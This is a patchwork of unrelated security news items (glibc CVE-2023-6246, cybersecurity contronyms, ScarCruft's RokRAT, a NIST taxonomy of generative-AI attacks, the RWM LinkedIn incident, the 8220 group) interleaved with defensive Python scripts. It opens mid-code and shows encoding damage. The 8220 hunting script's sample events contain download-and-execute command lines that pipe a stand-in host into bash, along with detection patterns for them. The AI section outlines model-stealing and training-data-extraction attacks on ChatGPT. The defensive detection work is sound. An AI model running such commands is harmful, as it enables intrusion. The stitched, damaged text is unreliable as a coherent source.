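    for user, entry in report.items():
        hits = mfa_changes_after(user, _parse_ts(entry["first_seen"]), audit)
        entry["mfa_changes"] = [f'{a["activity"]}: {a["detail"]}' for a in hits]
        entry["apps"] = sorted(entry["apps"])
        entry["ips"] = sorted(entry["ips"])
    return report


def triage(entry):
    """A UA+app hit alone is worth a look; a new MFA method minutes later is the
    persistence step the report describes and should page someone."""
    if entry["mfa_changes"] and "My Signins" in entry["apps"]:
        return "high"
    if "Office 365 Exchange Online" in entry["apps"]:
        return "medium"
    return "low"


if __name__ == "__main__":
    for user, entry in summarize(SIGNINS, AUDIT).items():
        print(f"{triage(entry).upper():6} {user} first={entry['first_seen']} "
              f"apps={entry['apps']} ips={entry['ips']} mfa={entry['mfa_changes']}")
```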
The recent discovery of a significant flaw in the GNU C Library (glibc), a fundamental component of major Linux distributions, has raised serious security concerns. This flaw grants attackers root access, posing a critical threat to the security of Linux systems.
Vulnerability in GNU C Library (glibc): The GNU C Library, commonly known as glibc, is an essential part of Linux distributions. It provides the core libraries for the system, including those used for file handling, mathematical computations, and system calls.
Root Access Granted: The flaw discovered in glibc allows attackers to gain full root access to Linux machines. Root access means having complete control over the system, enabling an attacker to perform any action, including installing software, accessing all files, and modifying system configurations.
CVE ID: CVE-2023-6246
Description: This vulnerability is related to a dynamic memory buffer overflow and is classified as a Local Privilege Escalation (LPE) issue. It was found in glibc’s __vsyslog_internal() function, which is called by the widely-used syslog and vsyslog functions.
Impact: The flaw allows unprivileged attackers to gain root access on various major Linux distributions in their default configurations. This level of access can enable attackers to take complete control over the affected system.
Severity: Given its potential for granting root access, this vulnerability is considered highly severe.
HOW THE FLAW WORKS
Local Privilege Escalation: The vulnerability is a local privilege escalation (LPE) issue. This means that an attacker who already has access to the system (even with limited privileges) can exploit this flaw to gain root-level access.
Exploitation Requirements: To exploit this flaw, attackers need a Set-User-ID (SUID) binary. SUID is a special type of file permission that allows users to execute a program with the permissions of the file owner, which in many cases is the root user.
IMPACT AND SEVERITY
Widespread Impact: Given the ubiquitous use of glibc in Linux distributions, the impact of this vulnerability is widespread, affecting a vast number of systems and applications.
High Severity: The flaw is considered high severity due to its potential to grant attackers complete control over the affected systems.
MITIGATION AND RESPONSE
Disabling SUID Binaries: One suggested mitigation is to disable SUID binaries using “no new privileges” mode, which can be implemented with tools like systemd or bwrap.
Patch and Update: Users and administrators are urged to apply patches and updates provided by their Linux distribution as soon as they become available. Staying updated is crucial in preventing the exploitation of this vulnerability.
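The two preconditions named above, a SUID binary to abuse and the absence of “no new privileges” mode, can be inventoried from userland. The following Python is an added example (not from the advisory or the glibc project): it lists setuid regular files under a tree and parses the NoNewPrivs field of /proc/<pid>/status, the flag that systemd’s NoNewPrivileges=yes and bwrap set and that makes the kernel ignore setuid bits on execve. The scan target and status text in the demo are constructed.

```python
"""Exposure audit for the two preconditions in the text: SUID binaries present, and
processes running without the no_new_privs flag.

Added example, not from the advisory or glibc. It inventories exposure only; it does
not touch syslog() or test the bug itself.
"""
import os
import stat
import tempfile


def is_suid(mode):
    """True for a regular file with the setuid bit, the kind of binary the advisory
    says an attacker needs to turn the overflow into root."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root):
    """Walk `root`, return sorted relative paths of setuid regular files.
    lstat() is used so symlinks are never followed outside the tree."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # raced deletion or permission denied: skip, do not abort
            if is_suid(st.st_mode):
                found.append(os.path.relpath(path, root))
    return sorted(found)


def no_new_privs(status_text):
    """Parse /proc/<pid>/status text. True when NoNewPrivs is 1 (setuid bits are
    ignored for this process and its children), False when 0, None when the kernel
    does not report the field."""
    for line in status_text.splitlines():
        if line.startswith("NoNewPrivs:"):
            return line.split(":", 1)[1].strip() == "1"
    return None


def self_no_new_privs():
    """Read the flag for the current process (Linux only)."""
    with open("/proc/self/status") as fh:
        return no_new_privs(fh.read())


# Constructed status text, as a unit-like process would show under NoNewPrivileges=yes.
CONSTRUCTED_STATUS = (
    "Name:\tbash\nUmask:\t0022\nState:\tS (sleeping)\n"
    "NoNewPrivs:\t1\nSeccomp:\t2\n"
)


def demo_suid_scan():
    """Build a constructed tree with one setuid file and one plain file, scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        suid_path = os.path.join(root, "bin", "fake-suid")
        plain_path = os.path.join(root, "bin", "plain")
        for p in (suid_path, plain_path):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(suid_path, 0o4755)   # owner may set the setuid bit on its own file
        os.chmod(plain_path, 0o755)
        return find_suid(root)


if __name__ == "__main__":
    print("constructed tree, setuid files:", demo_suid_scan())
    print("constructed status, no_new_privs:", no_new_privs(CONSTRUCTED_STATUS))
    if os.path.exists("/proc/self/status"):
        print("this process, no_new_privs:", self_no_new_privs())
    # Real audit: find_suid("/usr") and find_suid("/bin") on the host you manage.
```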
The discovery of the glibc flaw that grants root access to major Linux distributions is a stark reminder of the importance of system security and the need for constant vigilance. Users and administrators must take immediate action to mitigate the risk by applying patches and employing security best practices. As Linux continues to be a backbone for many systems and networks, ensuring its security is paramount for the integrity of countless applications and services.
One of the best ways to stay safe and secure when using your computers and other electronic devices is to be aware of the risks. For the past decade, that’s precisely what I’ve been doing.
Most risks are obvious: use strong passwords, don’t download and install software from untrustworthy websites, or hand your unlocked device to a third party.
However, there are less obvious — yet equally dangerous — risks that can result in device or network intrusion, or even device destruction.
Watch out: Some of the most effective and dangerous hacking tools are hard to tell apart from benign devices. They can even be cute.
The cybersecurity field continuously generates new terms and concepts as it evolves with time. It also repurposes words to describe new concepts. There’s a never-ending flow of jargon that some refer to as an alphabet soup of complexity. From NGAV to XDR, it appears unlikely for cybersecurity to run out of new acronyms and terminologies.
Meanwhile, some popular cybersecurity terms carry contradicting meanings. These are the so-called contronyms, which add some spice to the insipidity of tech terms. Here is a list of well-known cybersecurity words and phrases that many would think they are already familiar with, but whose other meanings are likely to surprise them.
HACKING
Most people tend to equate hacking to cybercrime, an attempt to illegally access, damage, or take over a computer system. This is not surprising given that most news articles that mention hacking use the term in its negative connotation, referring to cyber attacks aimed at bypassing access controls or security measures to prevent the unauthorized use of IT resources.
However, hacking can mean something positive or useful. In cybersecurity, system hacking can refer to an authorized effort to break existing security measures to test their effectiveness and spot weaknesses. The term often used for this action is “ethical hacking,” but hacking by itself is neither good nor bad. It’s how it is used that spells the difference.
Hacking in both its malicious and ethical instances follows the same stages. Also, they use similar techniques, from password cracking to phishing, the deployment of rootkits and trojans, exploitation of buffer overflows, privilege escalation, and the use of keyloggers. These steps and techniques are observed in attempts to exploit vulnerabilities and detect security weaknesses so that they can be plugged or resolved.
PATCHING
In contrast to hacking, patching is often perceived as a positive term. It is mostly known as the application of a software patch to address a vulnerability or add new functions. Software publishers regularly release patches for their software in response to developments in the cyber threat landscape and to provide improvements in their software products.
Negatively, patching refers to the unauthorized modification of software or a system by taking advantage of system vulnerabilities. Cybercriminals can infiltrate or corrupt software pipelines, allowing them to send out malicious software patches to unsuspecting users. This works because many tend to excessively trust their automated software pipelines or carelessly obtain their software updates from unofficial sources.
SNIFFING
Among those involved in network administration, sniffing is a legitimate process that entails the tracking and analysis of network traffic. This is done to undertake a troubleshooting task, monitor network performance, or facilitate network security-related actions. It is one of the vital actions in Intrusion Detection Systems (IDS).
However, sniffing can also refer to malicious packet sniffing, wherein an attacker intercepts the packets transmitted through a network. Sniffing allows bad actors to steal login credentials and other sensitive information. It can help them gain access to online accounts or steal crucial data. Sniffing is often used as a form of cyber attack on devices that connect to the internet through public WiFi networks.
Sniffing in the negative context is not new. It has been used as an attack for decades. Cybersecurity advocates pointed out the threat of sniffing more than a decade ago amid the proliferation of businesses that offer free public WiFi connection without strong security.
SCRIPTING
Scripting refers to the writing and deployment of scripts for the automation of repetitive tasks. It is used to automate routine actions, which enables the efficient management of systems. Scripting is also employed in penetration testing to simulate cyber attacks on a system. Similarly, it is used in log analysis and monitoring, day-to-day security operations, forensics and incident response, and cross-platform compatibility testing.
However, scripting can also be malicious, as used by threat actors. Cybercriminals can turn to malicious scripting to automate the execution of files that have been successfully introduced into a system. Successfully deceiving a computer user into downloading a file is not enough for the malicious file to inflict damage. Scripts are necessary to unleash the effects of malicious files and detect security vulnerabilities.
BACKDOOR
The term backdoor is usually known for its negative implication. Most news and articles refer to backdoors in an unfavorable context. This should not come as a surprise since backdoors are often used by cybercriminals. They serve as a way to bypass normal authentication for any computer-related system, facilitating unauthorized access or the introduction of malicious files to a computer or network.
However, backdoors can be a feature intentionally added to the software. They can be deliberately put in an app to provide an optional means of access in cases when conventional access methods are unavailable. This “necessary” version of a backdoor was in the spotlight some years ago when the US FBI asked Apple to purposely build a backdoor on their iPhones.
KILL CHAIN
The cyber kill chain is a framework developed by Lockheed Martin as part of its patented Intelligence Driven Defense model for cyber attack identification and prevention. It consists of a series of steps that represent the different stages of a cyber attack, from early reconnaissance to command and control and “actions on objectives.” This model helps organizations visualize and comprehend the different stages of an attack, focusing on critical points in the attack, developing strategies to mitigate threats, and boosting incident response capabilities.
Essentially, the kill chain is a process that is supposed to help organizations prepare for cyber attacks, successfully fend off an assault, and mitigate problems that emerge in the wake of a cyber attack. However, the phrase kill chain, in colloquial use, may refer to a successful cyber attack.
AN EXERCISE IN CYBERSECURITY JARGON COMPLEXITY
It may sound confusing, but contronyms exist everywhere. Interestingly, these words still make sense despite the auto-contradiction. In cybersecurity, contronyms reflect the complexity and flexibility of language, showing how words can change in meaning depending on their context and usage.
Isn’t it counterintuitive for cybersecurity terms to bear contradicting meanings? Possibly. However, what is ultimately important is the understanding that cybersecurity terms are far from straightforward. It is a must to properly get acquainted with them to understand what they really mean, especially with the rise of a plethora of acronyms and jargon introduced by security solution providers, many of which tend to be marketing-speak or misnomers.
North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor
Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as ScarCruft in December 2023.
“ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals,” SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report shared with The Hacker News.
The North Korea-linked adversary, also known by the names APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is assessed to be part of the Ministry of State Security (MSS), placing it apart from Lazarus Group and Kimsuky, which are elements within the Reconnaissance General Bureau (RGB).
Earlier this week, North Korean state media reported that the country had carried out a test of its “underwater nuclear weapons system” in response to drills by the U.S., South Korea, and Japan, describing the exercises as a threat to its national security.
The latest attack chain observed by SentinelOne targeted an expert in North Korean affairs by posing as a member of the North Korea Research Institute, urging the recipient to open a ZIP archive file containing presentation materials.
While seven of the nine files in the archive are benign, two of them are malicious Windows shortcut (LNK) files, mirroring a multi-stage infection sequence previously disclosed by Check Point in May 2023 to distribute the RokRAT backdoor.
There is evidence to suggest that some of the individuals who were targeted around December 13, 2023, were also previously singled out a month prior on November 16, 2023.
SentinelOne said its investigation also uncovered malware (two LNK files, “inteligence.lnk” and “news.lnk”, as well as shellcode variants delivering RokRAT) that’s said to be part of the threat actor’s planning and testing processes.
While the former shortcut file just opens the legitimate Notepad application, the shellcode executed via news.lnk paves the way for the deployment of RokRAT, although this infection procedure is yet to be observed in the wild, indicating its likely use for future campaigns.
Both LNK files have been observed deploying the same decoy document, a legitimate threat intelligence report about the Kimsuky threat group published by South Korean cybersecurity company Genians in late October 2023, in a move that implies an attempt to expand its target list.
This has raised the possibility that the adversary could be looking to gather information that could help it refine its operational playbook and also target or mimic cybersecurity professionals to infiltrate specific targets via brand impersonation techniques.
The development is a sign that the nation-state hacking crew is actively tweaking its modus operandi in an apparent effort to circumvent detection in response to public disclosure about its tactics and techniques.
“ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies,” the researchers said.
“This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.”
In the rapidly evolving landscape of artificial intelligence, generative AI systems have become a cornerstone of innovation, driving advancements in fields ranging from language processing to creative content generation. However, a recent report by the National Institute of Standards and Technology (NIST) sheds light on the increasing vulnerability of these systems to a range of sophisticated cyber attacks. The report provides a comprehensive taxonomy of attacks targeting Generative AI (GenAI) systems, revealing the intricate ways in which these technologies can be exploited. The findings are particularly relevant as AI continues to integrate deeper into various sectors, raising concerns about the integrity and privacy implications of these systems.
INTEGRITY ATTACKS: A THREAT TO AI’S CORE
Integrity attacks affecting Generative AI systems are a type of security threat where the goal is to manipulate or corrupt the functioning of the AI system. These attacks can have significant implications, especially as Generative AI systems are increasingly used in various fields. Here are some key aspects of integrity attacks on Generative AI systems:
Data Poisoning:
Detail: This attack targets the training phase of an AI model. Attackers inject false or misleading data into the training set, which can subtly or significantly alter the model’s learning. This can result in a model that generates biased or incorrect outputs.
Example: Consider a facial recognition system being trained with a dataset that has been poisoned with subtly altered images. These images might contain small, imperceptible changes that cause the system to incorrectly recognize certain faces or objects.
Model Tampering:
Detail: In this attack, the internal parameters or architecture of the AI model are altered. This could be done by an insider with access to the model or by exploiting a vulnerability in the system.
Example: An attacker could alter the weightings in a sentiment analysis model, causing it to interpret negative sentiments as positive, which could be particularly damaging in contexts like customer feedback analysis.
Output Manipulation:
Detail: This occurs post-processing, where the AI’s output is intercepted and altered before it reaches the end-user. This can be done without directly tampering with the AI model itself.
Example: If a Generative AI system is used to generate financial reports, an attacker could intercept and manipulate the output to show incorrect financial health, affecting stock prices or investor decisions.
Adversarial Attacks:
Detail: These attacks use inputs that are specifically designed to confuse the AI model. These inputs are often indistinguishable from normal inputs to the human eye but cause the AI to make errors.
Example: A stop sign with subtle stickers or graffiti might be recognized as a speed limit sign by an autonomous vehicle’s AI system, leading to potential traffic violations or accidents.
Backdoor Attacks:
Detail: A backdoor is embedded into the AI model during its training. This backdoor is activated by certain inputs, causing the model to behave unexpectedly or maliciously.
Example: A language translation model could have a backdoor that, when triggered by a specific phrase, starts inserting or altering words in a translation, potentially changing the message’s meaning.
Exploitation of Biases:
Detail: This attack leverages existing biases within the AI model. AI systems can inherit biases from their training data, and these biases can be exploited to produce skewed or harmful outputs.
Example: If an AI model used for resume screening has an inherent gender bias, attackers can submit resumes that are tailored to exploit this bias, increasing the likelihood of certain candidates being selected or rejected unfairly.
Evasion Attacks:
Detail: In this scenario, the input data is manipulated in such a way that the AI system fails to recognize it as something it is trained to detect or categorize correctly.
Example: Malware could be designed to evade detection by an AI-powered security system by altering its code signature slightly, making it appear benign to the system while still carrying out malicious functions.
PRIVACY ATTACKS ON GENERATIVE AI
Privacy attacks on Generative AI systems are a serious concern, especially given the increasing use of these systems in handling sensitive data. These attacks aim to compromise the confidentiality and privacy of the data used by or generated from these systems. Here are some common types of privacy attacks, explained in detail with examples:
Model Inversion Attacks:
Detail: In this type of attack, the attacker tries to reconstruct the input data from the model’s output. This is particularly concerning if the AI model outputs something that indirectly reveals sensitive information about the input data.
Example: Consider a facial recognition system that outputs the likelihood of certain attributes (like age or ethnicity). An attacker could use this output information to reconstruct the faces of individuals in the training data, thereby invading their privacy.
Membership Inference Attacks:
Detail: These attacks aim to determine whether a particular data record was used in the training dataset of a machine learning model. This can be a privacy concern if the training data contains sensitive information.
Example: An attacker might test an AI health diagnostic tool with specific patient data. If the model’s predictions are unusually accurate or certain, it might indicate that the patient’s data was part of the training set, potentially revealing sensitive health information.
Training Data Extraction:
Detail: Here, the attacker aims to extract actual data points from the training dataset of the AI model. This can be achieved by analyzing the model’s responses to various inputs.
Example: An attacker could interact with a language model trained on confidential documents and, through carefully crafted queries, could cause the model to regurgitate snippets of these confidential texts.
Reconstruction Attacks:
Detail: Similar to model inversion, this attack focuses on reconstructing the input data, often in a detailed and high-fidelity manner. This is particularly feasible in models that retain a lot of information about their training data.
Example: In a generative model trained to produce images based on descriptions, an attacker might find a way to input specific prompts that cause the model to generate images closely resembling those in the training set, potentially revealing private or sensitive imagery.
Property Inference Attacks:
Detail: These attacks aim to infer properties or characteristics of the training data that the model was not intended to reveal. This could expose sensitive attributes or trends in the data.
Example: An attacker might analyze the output of a model used for employee performance evaluations to infer unprotected characteristics of the employees (like gender or race), which could be used for discriminatory purposes.
Model Stealing or Extraction:
Detail: In this case, the attacker aims to replicate the functionality of a proprietary AI model. By querying the model extensively and observing its outputs, the attacker can create a similar model without access to the original training data.
Example: A competitor could use the public API of a machine learning model to systematically query it and use the responses to train a new model that mimics the original, effectively stealing the intellectual property.
SEGMENTING ATTACKS
Attacks on AI systems, including ChatGPT and other generative AI models, can be further categorized based on the stage of the learning process they target (training or inference) and the attacker’s knowledge and access level (white-box or black-box). Here’s a breakdown:
BY LEARNING STAGE:
Attacks during Training Phase:
Data Poisoning: Injecting malicious data into the training set to compromise the model’s learning process.
Backdoor Attacks: Embedding hidden functionalities in the model during training that can be activated by specific inputs.
Attacks during Inference Phase:
Adversarial Attacks: Presenting misleading inputs to trick the model into making errors during its operation.
Model Inversion and Reconstruction Attacks: Attempting to infer or reconstruct input data from the model’s outputs.
Membership Inference Attacks: Determining whether specific data was used in the training set by observing the model’s behavior.
Property Inference Attacks: Inferring properties of the training data not intended to be disclosed.
Output Manipulation: Altering the model’s output after it has been generated but before it reaches the intended recipient.
BY ATTACKER’S KNOWLEDGE AND ACCESS:
White-Box Attacks (Attacker has full knowledge and access):
Model Tampering: Directly altering the model’s parameters or structure.
Backdoor Attacks: Implanting a backdoor during the model’s development, which the attacker can later exploit.
These attacks require deep knowledge of the model’s architecture, parameters, and potentially access to the training process.
Black-Box Attacks (Attacker has limited or no knowledge and access):
Adversarial Attacks: Creating input samples designed to be misclassified or misinterpreted by the model.
Model Inversion and Reconstruction Attacks: These do not require knowledge of the model’s internal workings.
Membership and Property Inference Attacks: Based on the model’s output to certain inputs, without knowledge of its internal structure.
Training Data Extraction: Extracting information about the training data through extensive interaction with the model.
Model Stealing or Extraction: Replicating the model’s functionality by observing its inputs and outputs.
IMPLICATIONS:
Training Phase Attacks often require insider access or a significant breach in the data pipeline, making them less common but potentially more devastating.
Inference Phase Attacks are more accessible to external attackers as they can often be executed with minimal access to the model.
White-Box Attacks are typically more sophisticated and require a higher level of access and knowledge, often limited to insiders or through major security breaches.
Black-Box Attacks are more common in real-world scenarios, as they can be executed with limited knowledge about the model and without direct access to its internals.
Understanding these categories helps in devising targeted defense strategies for each type of attack, depending on the specific vulnerabilities and operational stages of the AI system.
HACKING CHATGPT
The ChatGPT AI model, like any advanced machine learning system, is potentially vulnerable to various attacks, including privacy and integrity attacks. Letâs explore how these attacks could be or have been used against ChatGPT, focusing on the privacy attacks mentioned earlier:
Model Inversion Attacks:
Potential Use Against ChatGPT: An attacker might attempt to use ChatGPTâs responses to infer details about the data it was trained on. For example, if ChatGPT consistently provides detailed and accurate information about a specific, less-known topic, it could indicate the presence of substantial training data on that topic, potentially revealing the nature of the data sources used.
Membership Inference Attacks:
Potential Use Against ChatGPT: This type of attack could try to determine if a particular text or type of text was part of ChatGPTâs training data. By analyzing the modelâs responses to specific queries, an attacker might guess whether certain data was included in the training set, which could be a concern if the training data included sensitive or private information.
Training Data Extraction:
Potential Use Against ChatGPT: Since ChatGPT generates text based on patterns learned from its training data, there's a theoretical risk that an attacker could manipulate the model to output segments of text that closely resemble or replicate parts of its training data. This is particularly sensitive if the training data contained confidential or proprietary information.
Reconstruction Attacks:
Potential Use Against ChatGPT: Similar to model inversion, attackers might try to reconstruct input data (like specific text examples) that the model was trained on, based on the information the model provides in its outputs. However, given the vast and diverse dataset ChatGPT is trained on, reconstructing specific training data can be challenging.
Property Inference Attacks:
Potential Use Against ChatGPT: Attackers could analyze responses from ChatGPT to infer properties about its training data that aren't explicitly modeled. For instance, if the model shows biases or tendencies in certain responses, it might reveal unintended information about the composition or nature of the training data.
Model Stealing or Extraction:
Potential Use Against ChatGPT: This involves querying ChatGPT extensively to understand its underlying mechanisms and then using this information to create a similar model. Such an attack would be an attempt to replicate ChatGPT's capabilities without access to the original model or training data.
Integrity attacks on AI models like ChatGPT aim to compromise the accuracy and reliability of the model's outputs. Let's examine how these attacks could be or have been used against the ChatGPT model, categorized by the learning stage and attacker's knowledge:
ATTACKS DURING TRAINING PHASE (WHITE-BOX):
Data Poisoning: If an attacker gains access to the training pipeline, they could introduce malicious data into ChatGPT's training set. This could skew the model's understanding and responses, leading it to generate biased, incorrect, or harmful content.
Backdoor Attacks: An insider or someone with access to the training process could implant a backdoor into ChatGPT. This backdoor might trigger specific responses when certain inputs are detected, which could be used to spread misinformation or other harmful content.
ATTACKS DURING INFERENCE PHASE (BLACK-BOX):
Adversarial Attacks: These involve presenting ChatGPT with specially crafted inputs that cause it to produce erroneous outputs. For instance, an attacker could find a way to phrase questions or prompts that consistently mislead the model into giving incorrect or nonsensical answers.
Output Manipulation: This would involve intercepting and altering ChatGPT's responses after they are generated but before they reach the user. While this is more of an attack on the communication channel rather than the model itself, it can still undermine the integrity of ChatGPT's outputs.
IMPLICATIONS AND DEFENSE STRATEGIES:
During Training: Ensuring the security and integrity of the training data and process is crucial. Regular audits, anomaly detection, and secure data handling practices are essential to mitigate these risks.
During Inference: Robust model design to resist adversarial inputs, continuous monitoring of responses, and secure deployment architectures can help in defending against these attacks.
REAL-WORLD EXAMPLES AND CONCERNS:
To date, there haven't been publicly disclosed instances of successful integrity attacks specifically against ChatGPT. However, the potential for such attacks exists, as demonstrated in academic and industry research on AI vulnerabilities.
OpenAI, the creator of ChatGPT, employs various countermeasures like input sanitization, monitoring model outputs, and continuously updating the model to address new threats and vulnerabilities.
In conclusion, while integrity attacks pose a significant threat to AI models like ChatGPT, a combination of proactive defense strategies and ongoing vigilance is key to mitigating these risks.
While these attack types broadly apply to all generative AI systems, the report notes that some vulnerabilities are particularly pertinent to specific AI architectures, like Large Language Models (LLMs) and Retrieval Augmented Generation (RAG) systems. These models, which are at the forefront of natural language processing, are susceptible to unique threats due to their complex data processing and generation capabilities.
The implications of these vulnerabilities are vast and varied, affecting industries from healthcare to finance, and even national security. As AI systems become more integrated into critical infrastructure and everyday applications, the need for robust cybersecurity measures becomes increasingly urgent.
The NIST report serves as a clarion call for the AI industry, cybersecurity professionals, and policymakers to prioritize the development of stronger defense mechanisms against these emerging threats. This includes not only technological solutions but also regulatory frameworks and ethical guidelines to govern the use of AI.
In conclusion, the report is a timely reminder of the double-edged nature of AI technology. While it offers immense potential for progress and innovation, it also brings with it new challenges and threats that must be addressed with vigilance and foresight. As we continue to push the boundaries of what AI can achieve, ensuring the security and integrity of these systems remains a paramount concern for a future where technology and humanity can coexist in harmony.
Fortunately for Radioactive Waste Management (RWM), the first-of-its-kind hacker attack on the project was unsuccessful.
The United Kingdom's Radioactive Waste Management (RWM) company overseeing the nation's radioactive waste has revealed a recent cyberattack attempt through LinkedIn. While the attack was reportedly unsuccessful, it has raised eyebrows in the nuclear sector, sparking concerns about the security of critical nuclear infrastructure.
As reported by The Guardian, the hackers directed their attack at the company through LinkedIn. However, whether it was a phishing attack or an attempt to trick employees into installing malware on the system, the modus operandi remains unknown.
Typically, LinkedIn is exploited for phishing scams targeting employees of specific companies. An example from last year involves ESET researchers reporting a cyberespionage campaign by North Korean government-backed hackers from the Lazarus group. The campaign specifically targeted employees at a Spanish aerospace firm.
The RWM is spearheading the £50bn Geological Disposal Facility (GDF) project, aimed at constructing a substantial underground nuclear waste repository in Britain. As a government-owned entity, RWM facilitated the merger of three nuclear bodies (the GDF project, the Low-Level Waste Repository, and another waste management entity) to establish Nuclear Waste Services (NWS).
"NWS has seen, like many other UK businesses, that LinkedIn has been used as a source to identify the people who work within our business. These attempts were detected and denied through our multi-layered defences," stated an NWS spokesperson.
However, the incident raises concerns, as experts warn that social media platforms such as LinkedIn are becoming preferred playgrounds for hackers. These platforms provide multiple avenues for infiltration, including the creation of fake accounts, phishing messages, and direct credential theft.
The FBI's special agent in charge of the San Francisco and Sacramento field offices, Sean Ragan, has emphasized the "significant threat" of fraudsters exploiting LinkedIn to lure users into cryptocurrency investment schemes, citing numerous potential victims and past and current cases.
In October 2023, email security firm Cofense discovered a phishing campaign abusing Smart Links, part of the LinkedIn Sales Navigator and Enterprise service, to send authentic-looking emails, steal payment data, and bypass email protection mechanisms.
In November 2023, a LinkedIn database containing over 35 million users' personal information was leaked by a hacker named USDoD, who previously breached the FBI's InfraGard platform. The database was obtained through web scraping, an automated process to extract data from websites.
In 2023, the Sellafield nuclear site in Cumbria experienced cybersecurity issues, indicating a need for improved safeguards and tighter regulations. The RWM incident highlights the growing interest of cybercrime syndicates in targeting nuclear sites.
The NWS acknowledges the need for continuous improvement to strengthen cybersecurity measures, highlighting that emergency response plans must match evolving business needs.
The 8220 hacker group, which was first identified in 2017 by Cisco Talos, is exploiting both Windows and Linux web servers with crypto-jacking malware. One of their recent activities involved the exploitation of Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228).
The group's history also includes exploiting vulnerabilities in Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications. Their TTPs have evolved alongside the different publicly released exploits.
8220 Hacker Group
In addition to this, the group was also discovered to be exploiting CVE-2020-14883, a remote code execution vulnerability in Oracle WebLogic Server. This exploitation chain is combined with an authentication bypass vulnerability (CVE-2020-14882) in Oracle WebLogic Server.
The exploitation methods of these two vulnerabilities are publicly available, making it relatively easy for the threat actor to modify and exploit them for malicious purposes.
Two different exploit chains were discovered, and one of them enables the loading of an XML file used for further phases of execution of commands on the OS, whereas the other one executes Java code without the use of an XML file.
Infection Chains
The first infection chain uses different XML files that depend on the target OS. In the case of Linux, the downloading of other files is performed via cURL, wget, lwp-download, and python urllib along with a custom bash function that encodes it to base64.
The second method injects Java code which first evaluates the OS and then executes the same command strings used in the first method. Once the download and execution process takes place, the compromised hosts are infected with the AgentTesla, rhajk, and nasqa malware variants.
A complete report has been published, which provides detailed information about the exploitation, command used, encoding, and other information.
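A hunting query, as an added example that is not part of the 8220 reporting, which scores process-creation events for the downloader pattern described above (curl/wget/lwp-download/urllib fallback chains, base64 decoding, piping into a shell) when it originates from a web application service account. The event layout, the sample lines and the indicator weights are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry). The field
# layout "timestamp host user command-line" is an assumption of this example;
# 203.0.113.10 is a documentation address standing in for a payload host.
SAMPLE_EVENTS = [
    "2023-12-01T10:00:01Z web01 weblogic /usr/bin/java -Dweblogic.Name=AdminServer weblogic.Server",
    "2023-12-01T10:02:13Z web01 weblogic bash -c \"(curl -fsSL http://203.0.113.10/x.sh || wget -qO- http://203.0.113.10/x.sh || lwp-download http://203.0.113.10/x.sh /tmp/x.sh) | bash\"",
    "2023-12-01T10:02:14Z web01 weblogic python -c \"import urllib; open('/tmp/x', 'wb').write(urllib.urlopen('http://203.0.113.10/x').read())\"",
    "2023-12-01T10:05:00Z web02 admin curl -sS https://updates.example.com/patch.tar.gz -o /tmp/patch.tar.gz",
    "2023-12-01T10:06:30Z web02 root sh -c \"echo ZWNobyBoaQ== | base64 -d | sh\"",
]

# Accounts that run web application servers (assumption; tune per estate). A
# downloader or shell spawned by them is far more suspicious than the same
# command run by an administrator.
SERVICE_ACCOUNTS = {"weblogic", "tomcat", "www-data", "oracle", "hadoop"}

DOWNLOADERS = re.compile(r"\b(curl|wget|lwp-download|urllib)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")
BASE64_DECODE = re.compile(r"base64\s+(?:-d\b|--decode)|b64decode\(")
TMP_DROP = re.compile(r"/(?:tmp|dev/shm|var/tmp)/")
EVENT_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")

# Indicator weights: a single download into /tmp is routine admin activity,
# a fallback chain of downloaders piped into a shell is not.
WEIGHTS = {
    "downloader": 1,
    "downloader_fallback_chain": 2,
    "pipe_to_shell": 2,
    "base64_decode": 2,
    "tmp_drop": 1,
    "service_account_shell": 2,
}


def parse_event(line: str) -> Dict[str, str]:
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    ts, host, user, cmd = m.groups()
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (weighted score, matched indicators) for one event."""
    cmd = ev["cmd"]
    hits: List[str] = []
    tools = set(DOWNLOADERS.findall(cmd))
    if tools:
        hits.append("downloader")
    if len(tools) >= 2:  # "curl || wget || lwp-download" style fallback chain
        hits.append("downloader_fallback_chain")
    if PIPE_TO_SHELL.search(cmd):
        hits.append("pipe_to_shell")
    if BASE64_DECODE.search(cmd):
        hits.append("base64_decode")
    if TMP_DROP.search(cmd):
        hits.append("tmp_drop")
    spawns_shell = "bash -c" in cmd or "sh -c" in cmd
    if ev["user"] in SERVICE_ACCOUNTS and (tools or spawns_shell):
        hits.append("service_account_shell")
    return sum(WEIGHTS[h] for h in hits), hits


def hunt(lines: List[str], threshold: int = 3) -> List[Dict[str, object]]:
    """Return the events whose weighted indicator score reaches the threshold."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({**ev, "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']} score={f['score']} {f['indicators']}")
```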
